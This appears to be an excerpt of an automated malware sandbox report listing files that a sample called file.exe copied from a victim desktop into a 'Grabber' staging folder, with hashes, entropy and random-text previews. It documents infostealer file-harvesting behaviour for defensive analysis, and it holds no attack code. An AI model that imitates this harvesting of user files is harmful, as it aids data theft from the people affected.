                                                                                                                                                            Preview:GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE\HQJBRDYKDE.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\HQJBRDYKDE\NIRMEKAMZH.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\LHEPQPGEWF.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\LHEPQPGEWF.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694579526837108
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:9mugycA/B3wI1sZj9s/A0ikL8GO/M81cJzg+S+fBXOQklGKJx3:9mk53zsZj9s/okLklcJs+SOXlkEKJx3
                                                                                                                                                            MD5:2DB1C5AA015E3F413D41884AC02B89BC
                                                                                                                                                            SHA1:4872ADF2EA66D90FC5B417E4698CFF3E9A247E7B
                                                                                                                                                            SHA-256:956C48539B32DB34EE3DAF968CC43EA462EE5622B66E3A7CB8705762EB0662F1
                                                                                                                                                            SHA-512:C80222D65C3287D0A2FB5EB44A59737BC748C95ECDF14350A880CD653D3C39E7B47543AAE9C0CC541A16347E6E4217FB45DF4C96381D5BD820556186ED48B790
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:LHEPQPGEWFOTTQHSFLPBDXLJVIUIXWOOHQVLZZIQOCFCCEMSPRTXAPYFKSXYXVFDPHPQVAQHOZTUKTMJPASSTGRXMYXGTLXIDQDVPWENFWHMFYQPBDWALBTHWFOOGFTAJOXJBCGAVMROZGTDWNNZZNJOIJGZLOORSLIGDTUKELZEAWCYJTOCEDKRQNUGUKGINWRVRIZBLNYZHTMFJHWMYODPGAYRQUTWYNKXDXGKZLBYJUDEGJGEGGHMFVTYCBCXJLBZAVKSUEGYRDAPRFIVDNDOIAEPTSNOQFOOYEDVSQTUFNNEYEEUIGJOAYENLWRFYHNPMJNOZNEWSOETCFVVGOQTOKWOVXYWOINEAHLDWXJOPISMHAIKZHVABPYANLCFQWIKUEGSZHGQKKWXTPUBFIXPWCKKSPWIPKGVNCWXTOLJGASSVRYTWKPOWKPNKRHTBSWQBFRVFTWBQEAGHCBTYUFFUUUEETCJIOPUPTHSBHQEPTFPMXQQDWNNIRISDVIUYUOMWIIEYUYGBMYTIPYRGIATEQQSHUXUTRPDXNWAGJAKJPNFAPNYOTRVPNRXEZYSZWDTXKAXFRFJSUHYWTTFWKBWWGQZXFZOXEFCXWVJDFWPMHLZGURBFMSNLFBZNHUAJHVNINGYNAEWHGWKJBYXTUXMFQKRFOCECDYREJUHNVDFGROXJCUQIMSSVRUGWEDDVIRDZYNYCRKTARFGNITFDORCBEIQVJPSIHLNFESPXNWWDSQILJLOVDKOQDNPUZXOJMYFJZKGNEFRLRATVHAMWMOUECPSNVCBIKZMPKBFTSOCSGKZGVKBNJJNGBHUKRERZCJYAICQVNEGQNFRLIKBCSEOCBSYDJBTCRZCCBTDDJNOETTYBUTBOBMQASYZUQJGKMPCMPBLFJALTHXFLNPFUSGVPUKMAQGHDSYASPYSACRNHOHKPBWPSTTZGQCXZWHSUOTIYNSQFNBEDMNZOZYYUDSPJXWXHROGZMTALITD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\NIRMEKAMZH.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\NIRMEKAMZH.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694574194309462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                            MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                            SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                            SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                            SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\PWZOQIFCAN.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.695900624002646
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:55kzf0ILfo2TdftHFyQ9yi5pS2+w9gHtKgqin5q+GzA0Kb08Vb5nY1NLIeukWg/w:56zcILlTxtX9j5TijGzVURS5IBgSGVny
                                                                                                                                                            MD5:BC4419B8B9970FEDCD704610C64179B0
                                                                                                                                                            SHA1:71BD107584E1CFC5E5E75F765C064FC13228BC96
                                                                                                                                                            SHA-256:A2115F382834559DCAB7139CB455FEFBEBBF07B89E2B4B8CFA3DC152491DAC1F
                                                                                                                                                            SHA-512:454E3C24F975C0F56F152D24D32C544918CC7663B01CC50C717FAD082B201D4265DA9C5808AFA58573BC104AB739330AEAD49156FA7E7419B3D7CE130EAF3142
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\QFAPOWPAFG\BQJUWOYRTO.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.68639364218091
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
                                                                                                                                                            MD5:1D78D2A3ECD9D04123657778C8317C4E
                                                                                                                                                            SHA1:3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
                                                                                                                                                            SHA-256:88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
                                                                                                                                                            SHA-512:7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
                                                                                                                                                            Malicious:false
